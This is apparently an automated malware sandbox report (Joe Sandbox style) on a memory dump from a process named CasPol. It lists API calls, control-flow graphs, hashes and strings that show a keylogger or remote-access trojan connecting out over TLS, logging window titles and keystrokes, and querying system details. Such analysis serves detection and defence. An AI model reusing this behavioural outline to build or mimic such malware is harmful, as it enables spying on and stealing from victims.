                                                                                                                                                              • Opcode Fuzzy Hash: 011bd7a893169c3b8833ad9f51b270e3128e7b6ab554ae5cec31d1ab042eb71a
                                                                                                                                                              • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1384 40428c-4042ad connect 1385 4043e1-4043e5 1384->1385 1386 4042b3-4042b6 1384->1386 1389 4043e7-4043f5 WSAGetLastError 1385->1389 1390 40445f 1385->1390 1387 4043da-4043dc 1386->1387 1388 4042bc-4042bf 1386->1388 1391 404461-404465 1387->1391 1392 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1388->1392 1393 4042eb-4042f5 call 420151 1388->1393 1389->1390 1394 4043f7-4043fa 1389->1394 1390->1391 1392->1393 1406 404306-404313 call 420373 1393->1406 1407 4042f7-404301 1393->1407 1396 404439-40443e 1394->1396 1397 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1394->1397 1399 404443-40445c call 401f66 * 2 call 41a686 1396->1399 1397->1390 1399->1390 1416 404315-404338 call 401f66 * 2 call 41a686 1406->1416 1417 40434c-404357 call 420f34 1406->1417 1407->1399 1446 40433b-404347 call 420191 1416->1446 1430 404389-404396 call 4202ea 1417->1430 1431 404359-404387 call 401f66 * 2 call 41a686 call 420592 1417->1431 1443 404398-4043bb call 401f66 * 2 call 41a686 1430->1443 1444 4043be-4043d7 CreateEventW * 2 1430->1444 1431->1446 1443->1444 1444->1387 1446->1390
                                                                                                                                                              APIs
                                                                                                                                                              • connect.WS2_32(?,0064BB38,00000010), ref: 004042A5
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                              • API String ID: 994465650-2151626615
                                                                                                                                                              • Opcode ID: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
                                                                                                                                                              • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                                                                              • Opcode Fuzzy Hash: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
                                                                                                                                                              • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                              • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3658366068-0
                                                                                                                                                              • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                                              • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                                                                              • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                                              • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                              • API String ID: 911427763-3954389425
                                                                                                                                                              • Opcode ID: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
                                                                                                                                                              • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                                                                              • Opcode Fuzzy Hash: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
                                                                                                                                                              • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1556 40c89e-40c8c3 call 401e52 1559 40c8c9 1556->1559 1560 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1556->1560 1561 40c8d0-40c8d5 1559->1561 1562 40c9c2-40c9c7 1559->1562 1563 40c905-40c90a 1559->1563 1564 40c9d8 1559->1564 1565 40c9c9-40c9ce call 43ac0f 1559->1565 1566 40c8da-40c8e8 call 41a74b call 401e18 1559->1566 1567 40c8fb-40c900 1559->1567 1568 40c9bb-40c9c0 1559->1568 1569 40c90f-40c916 call 41b15b 1559->1569 1572 40c9dd-40c9e2 call 43ac0f 1561->1572 1562->1572 1563->1572 1564->1572 1576 40c9d3-40c9d6 1565->1576 1588 40c8ed 1566->1588 1567->1572 1568->1572 1585 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1569->1585 1586 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1569->1586 1581 40c9e3-40c9e8 call 4082d7 1572->1581 1576->1564 1576->1581 1581->1560 1594 40c8f1-40c8f6 call 401e13 1585->1594 1586->1588 1588->1594 1594->1560
                                                                                                                                                              APIs
                                                                                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LongNamePath
                                                                                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                              • API String ID: 82841172-425784914
                                                                                                                                                              • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                                                              • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                                                                              • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                                                              • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1718 41a51b-41a55a call 401faa call 43a88c InternetOpenW InternetOpenUrlW 1723 41a55c-41a57d InternetReadFile 1718->1723 1724 41a5a3-41a5a6 1723->1724 1725 41a57f-41a59f call 401f86 call 402f08 call 401eea 1723->1725 1727 41a5a8-41a5aa 1724->1727 1728 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1724->1728 1725->1724 1727->1723 1727->1728 1732 41a5be-41a5c8 1728->1732
                                                                                                                                                              APIs
                                                                                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                                                                              Strings
                                                                                                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                                                                                              • API String ID: 3121278467-91888290
                                                                                                                                                              • Opcode ID: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
                                                                                                                                                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                                                                              • Opcode Fuzzy Hash: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
                                                                                                                                                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                              • API String ID: 782494840-2070987746
                                                                                                                                                              • Opcode ID: 380e0d5536f16be207b79848a76edd497ebed83e63ff7fe5043507d4c2edcc5c
                                                                                                                                                              • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                                                                              • Opcode Fuzzy Hash: 380e0d5536f16be207b79848a76edd497ebed83e63ff7fe5043507d4c2edcc5c
                                                                                                                                                              • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                              • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                              • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                              • String ID: `AG
                                                                                                                                                              • API String ID: 1958988193-3058481221
                                                                                                                                                              • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                              • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                              • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                              • String ID: HgF$pth_unenc
                                                                                                                                                              • API String ID: 1818849710-3662775637
                                                                                                                                                              • Opcode ID: ce1b1880fa86f9afcc584a6235dbd77663573278f484025842f99512ca6562dc
                                                                                                                                                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                                              • Opcode Fuzzy Hash: ce1b1880fa86f9afcc584a6235dbd77663573278f484025842f99512ca6562dc
                                                                                                                                                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                              • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                              • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2152742572-0
                                                                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                              • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                              • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                              APIs
                                                                                                                                                              • send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              • WaitForSingleObject.KERNEL32(000002F8,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                              • SetEvent.KERNEL32(000002F8,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EventObjectSingleWaitsend
                                                                                                                                                              • String ID: LAL
                                                                                                                                                              • API String ID: 3963590051-3302426157
                                                                                                                                                              • Opcode ID: 8e3ac4017b7938842f7bdadaab4273c60c1aff030dea0fb14339be44d5f19cec
                                                                                                                                                              • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                                                                              • Opcode Fuzzy Hash: 8e3ac4017b7938842f7bdadaab4273c60c1aff030dea0fb14339be44d5f19cec
                                                                                                                                                              • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                                                                              APIs
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                              • String ID: Offline Keylogger Started
                                                                                                                                                              • API String ID: 465354869-4114347211
                                                                                                                                                              • Opcode ID: b3c31ab8b9b3ed7652650e24222149608630b0603d760ccce190acea4dbe7940
                                                                                                                                                              • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                                                                              • Opcode Fuzzy Hash: b3c31ab8b9b3ed7652650e24222149608630b0603d760ccce190acea4dbe7940
                                                                                                                                                              • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                              • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
